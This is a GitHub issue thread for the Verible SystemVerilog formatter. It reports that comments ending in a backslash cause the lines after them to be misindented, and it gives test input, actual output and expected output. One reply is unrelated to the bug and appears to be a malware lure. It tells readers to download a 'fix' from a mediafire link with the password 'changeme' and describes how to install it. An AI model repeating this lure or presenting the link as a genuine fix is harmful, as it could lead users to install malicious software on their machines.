chipsalliance/verible #2243: Misalignment with comments that end with backslash "\"

Stavegu, 2024-08-27:
**Test case**
The test case is a simple module description with ASCII Art Standard comments (some lines end with backslash).
There is excessive indentation (4 spaces vs 2 spaces configured).
```systemverilog
module test (

    input   logic       clk,        //! Input clock
    // Inputs
    input   logic [7:0] data_i,     //! Input data
    // Outputs
    output  logic [7:0] data_o      //! Output data
);

    //  __     __         _       _     _
    //  \ \   / /_ _ _ __(_) __ _| |__ | | ___  ___
    //   \ \ / / _` | '__| |/ _` | '_ \| |/ _ \/ __|
    //    \ V / (_| | |  | | (_| | |_) | |  __/\__ \
    //     \_/ \__,_|_|  |_|\__,_|_.__/|_|\___||___/
    logic [7:0] data;

    logic [7:0] data2;

    //--------------------------------------------------------------------------
    //! Description
    //--------------------------------------------------------------------------
    always_ff @(posedge clk)
    begin : test_aff
        data <= data_i;
    end

    //      _            _                   _   _
    //     / \   ___ ___(_) __ _ _ __   __ _| |_(_) ___  _ __  ___
    //    / _ \ / __/ __| |/ _` | '_ \ / _` | __| |/ _ \| '_ \/ __|
    //   / ___ \\__ \__ \ | (_| | | | | (_| | |_| | (_) | | | \__ \
    //  /_/   \_\___/___/_|\__, |_| |_|\__,_|\__|_|\___/|_| |_|___/
    //                     |___/
    assign data_o = data;

endmodule

```
**Actual output**

When executing `verible-verilog-format mymodule.sv` without any arguments, output is :
```systemverilog
module test (

    input  logic       clk,     //! Input clock
    // Inputs
    input  logic [7:0] data_i,  //! Input data
    // Outputs
    output logic [7:0] data_o   //! Output data
);

  //  __     __         _       _     _
  //  \ \   / /_ _ _ __(_) __ _| |__ | | ___  ___
  //   \ \ / / _` | '__| |/ _` | '_ \| |/ _ \/ __|
  //    \ V / (_| | |  | | (_| | |_) | |  __/\__ \
    //     \_/ \__,_|_|  |_|\__,_|_.__/|_|\___||___/
    logic [7:0] data;

  logic [7:0] data2;

  //--------------------------------------------------------------------------
  //! Description
  //--------------------------------------------------------------------------
  always_ff @(posedge clk) begin : test_aff
    data <= data_i;
  end

  //      _            _                   _   _
  //     / \   ___ ___(_) __ _ _ __   __ _| |_(_) ___  _ __  ___
  //    / _ \ / __/ __| |/ _` | '_ \ / _` | __| |/ _ \| '_ \/ __|
  //   / ___ \\__ \__ \ | (_| | | | | (_| | |_| | (_) | | | \__ \
    //  /_/   \_\___/___/_|\__, |_| |_|\__,_|\__|_|\___/|_| |_|___/
    //                     |___/
    assign data_o = data;

endmodule

```

After the backslash and up to an blank line, lines are not indented. So a misalignment appears. It is probably a conflict with preprocessor macro newline statement.

**Expected or suggested output**

```systemverilog
module test (

    input  logic       clk,     //! Input clock
    // Inputs
    input  logic [7:0] data_i,  //! Input data
    // Outputs
    output logic [7:0] data_o   //! Output data
);

  //  __     __         _       _     _
  //  \ \   / /_ _ _ __(_) __ _| |__ | | ___  ___
  //   \ \ / / _` | '__| |/ _` | '_ \| |/ _ \/ __|
  //    \ V / (_| | |  | | (_| | |_) | |  __/\__ \
  //     \_/ \__,_|_|  |_|\__,_|_.__/|_|\___||___/
  logic [7:0] data;

  logic [7:0] data2;

  //--------------------------------------------------------------------------
  //! Description
  //--------------------------------------------------------------------------
  always_ff @(posedge clk) begin : test_aff
    data <= data_i;
  end

  //      _            _                   _   _
  //     / \   ___ ___(_) __ _ _ __   __ _| |_(_) ___  _ __  ___
  //    / _ \ / __/ __| |/ _` | '_ \ / _` | __| |/ _ \| '_ \/ __|
  //   / ___ \\__ \__ \ | (_| | | | | (_| | |_| | (_) | | | \__ \
  //  /_/   \_\___/___/_|\__, |_| |_|\__,_|\__|_|\___/|_| |_|___/
  //                     |___/
  assign data_o = data;

endmodule

```

Version:
v0.0-3752-g8b64887e
Commit  2024-08-06
Built   2024-08-07T06:04:22Z

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

kbrunham-intel, 2026-09-22:
@hzeller I can take this issue.